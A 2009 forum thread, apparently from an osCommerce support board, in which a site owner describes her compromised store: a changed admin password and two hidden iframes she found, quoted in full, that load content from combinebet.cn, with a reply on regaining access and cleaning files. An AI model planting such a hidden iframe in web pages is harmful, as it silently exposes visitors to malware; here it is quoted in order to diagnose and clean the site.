palswithtails Posted June 4, 2009 Share Posted June 4, 2009 My website is still under development but is about 90% complete. So this morning google e-mailed me to inform me that palswithtails.com has been named as an infected website and that a warning will be posted when anyone visits my site. I checked it out for myself, and sure enough there is malware on my site. Google first made me verify that I was the owner by uploading a file via ftp to my site and then submitting it back to them. I was able to do this with no trouble. Then t hey suggested I go through every file on my server and look for invisible iframes, strange code, links, etc. I tried to log into my palswithtails.com/admin page and my password must have been changed. Great. So I log into MySQL (thankfully this password is OK), thinking I could change my OSCommerce password in the ADMINISTRATORS table. It had definitely been edited, about 25 characters long - just jumble. I replaced it with a completely new password. Still cant log in. Any ideas how I can fix my password issue (first of MANY steps on my road to recovery.) I'm desperate for help here. I don't want to lose all the work I have done in the last couple of months :( Thanks for any ideas! -Allie Link to comment Share on other sites More sharing options...
palswithtails Posted June 4, 2009 Author Share Posted June 4, 2009 Hello all - I am still not able to log in, but I have found 2 hidden iframes. One on my admin/index.php page and one on index.php This is what it looks like: <iframe src="http://combinebet.cn:8080/index.php" width=134 height=121 style="visibility: hidden"></iframe> Still looking for suggestions on a password reset. Somehow changing it in the table didn't work :( Link to comment Share on other sites More sharing options...
Guest Posted June 4, 2009 Share Posted June 4, 2009 Hello all - I am still not able to log in, but I have found 2 hidden iframes. One on my admin/index.php page and one on index.phpThis is what it looks like: <iframe src="http://combinebet.cn:8080/index.php" width=134 height=121 style="visibility: hidden"></iframe> Still looking for suggestions on a password reset. Somehow changing it in the table didn't work :( Create an account in your storefront and then copy it from your DB customer table to your administrator table. It should work. Also download a clean copy of osC and get a File Compare program and go through every line of code in your site to make sure you got all the bad code. Then figure out what you did wrong that allowed a hacker to get into your site. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.